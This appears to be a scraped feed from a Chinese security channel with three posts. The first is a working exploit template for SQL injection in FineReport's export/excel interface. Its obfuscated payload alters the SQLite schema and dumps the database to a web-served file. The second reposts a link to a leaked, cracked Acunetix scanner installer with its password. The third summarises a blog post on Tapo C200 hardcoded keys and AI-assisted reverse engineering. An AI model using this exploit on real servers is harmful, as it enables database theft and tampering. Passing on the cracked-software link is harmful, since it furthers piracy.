952
订阅者
-124 小时
-17 天
+1530 天
帖子存档
952
#渗透测试 #技术分享 #安全分享
id: FineReport-exportexcel-sqli
info:
name: FineReport-exportexcel-sqli
author: sibei
severity: high
tags: FineReport
http:
- raw:
- |
GET /webroot/ReportServer HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
viewlets: [{'reportlet':'/'}]
op: getSessionID
extractors:
- type: regex
part: body
name: id_upload
internal: true
regex:
- "[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}"
- raw:
- |+
GET /webroot/decision/nx/report/v9/largedataset/export/excel?functionParams=%7b%7d&__parameters__=%7b%7d HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:145.0) Gecko/20100101 Firefox/145.0
sessionID: {{id_upload}}
params: %3Cpd%3E%0A+%3CLargeDatasetExcelExportJS+dsName%3D%221%22%3E%0A%3CParameters%3E%3CParameter%3E%0A%3CAttributes+name%3D%22c%22%2F%3E%3CO+t%3D%22Formula%22%3E%3CAttributes%3E%3C%21%5BCDATA%5Bsql%28%27FRDemo%27%2CCONCATENATE%28%22pr%22%2C%22agm%22%2C%22a+wr%22%2C%22i%22%2C%22t%22%2C%22a%22%2C%22ble%22%2C%22_sch%22%2C%22e%22%2C%22ma%3Do%22%2C%22n%22%29%2C1%29-sql%28%27FRDemo%27%2CCONCATENATE%28%22dele%22%2C%22t%22%2C%22e+f%22%2C%22r%22%2C%22o%22%2C%22m+sq%22%2C%22li%22%2C%22t%22%2C%22e_sc%22%2C%22he%22%2C%22ma+w%22%2C%22here%22%2C%22+na%22%2C%22m%22%2C%22e%21%22%2C%22%3D%22%2C%22%27s%22%2C%22ql%22%2C%22ite%22%2C%22_s%22%2C%22ta%22%2C%22t%22%2C%221%27%22%29%2C1%29-sql%28%27FRDemo%27%2CCONCATENATE%28%22an%22%2C%22aly%22%2C%22ze%22%29%2C1%29-sql%28%27FRDemo%27%2CCONCATENATE%28%22re%22%2C%22p%22%2C%22lac%22%2C%22e+i%22%2C%22nto%22%2C%22+s%22%2C%22ql%22%2C%22ite_%22%2C%22st%22%2C%22at%22%2C%221+va%22%2C%22lu%22%2C%22es%28%27%22%2C%22%27%2C%27123%22%2C%22%27%22%2C%22%29%22%29%2C1%29-sql%28%27FRDemo%27%2CCONCATENATE%28%22V%22%2C%22A%22%2C%22C%22%2C%22U%22%2C%22U%22%2C%22M%22%2C%22+i%22%2C%22nt%22%2C%22o%28%27%22%2CENV_HOME%2C%22%2F%22%2C%22.%22%2C%22.%22%2C%22%2F%22%2C%22.%22%2C%22%2F%22%2C%22{{randstr}}%22%2C%22.%22%2C%22t%22%2C%22x%22%2C%22t%22%2C%22%27%29%22%29%2C1%29%5D%5D%3E%3C%2FAttributes%3E%3C%2FO%3E%3C%2FParameter%3E%3C%2FParameters%3E%3C%2FLargeDatasetExcelExportJS%3E%3C%2Fpd%3E
- raw:
- |
GET /webroot/{{randstr}}.txt HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
matchers-condition: and
matchers:
- type: word
part: body
words:
- "SQLite format"
- type: status
status:
- 200
帆软报表FineReport export/excel接口存在SQL注入漏洞952
Repost from Pwn3rzs
Acunetix v
25.11.251107123 - 14 Nov 2025
Windows: https://pwn3rzs.co/scanner_web/acunetix/Acunetix-v25.11.251107123-Windows-Pwn3rzs-CyberArsenal.rar
Linux: [No installer leaked, yet]
Password: Pwn3rzs
Changelog:
Too long for a post, refer here:
https://www.acunetix.com/changelogs/acunetix-premium/v25-11-12-november-2025/952
#网络安全 #技术分享 #知识分享 #CVE2025 #LLM
TP-Link Tapo C200:硬编码密钥、缓冲区溢出以及 AI 辅助逆向工程时代的隐私问题:
https://www.evilsocket.net/2025/12/18/TP-Link-Tapo-C200-Hardcoded-Keys-Buffer-Overflows-and-Privacy-in-the-Era-of-AI-Assisted-Reverse-Engineering
漏洞类型:硬编码密钥 (Hardcoded Keys):设备固件中直接嵌入了加密密钥或认证凭据,攻击者一旦提取固件即可轻松获取,从而破解加密通信。
AI 辅助逆向工程:作者强调了 LLM(大语言模型) 如何改变了安全研究。利用 AI 辅助分析反汇编代码、识别复杂的漏洞模式(如缓冲区溢出)以及编写利用脚本,使得过去需要数周的工作现在可能在数小时内完成。
涉及CVE:CVE-2025-8065、CVE-2025-14299、CVE-2025-14300
参考:
links:https://github.com/kayranfatih/awesome-iot-and-hardware-security
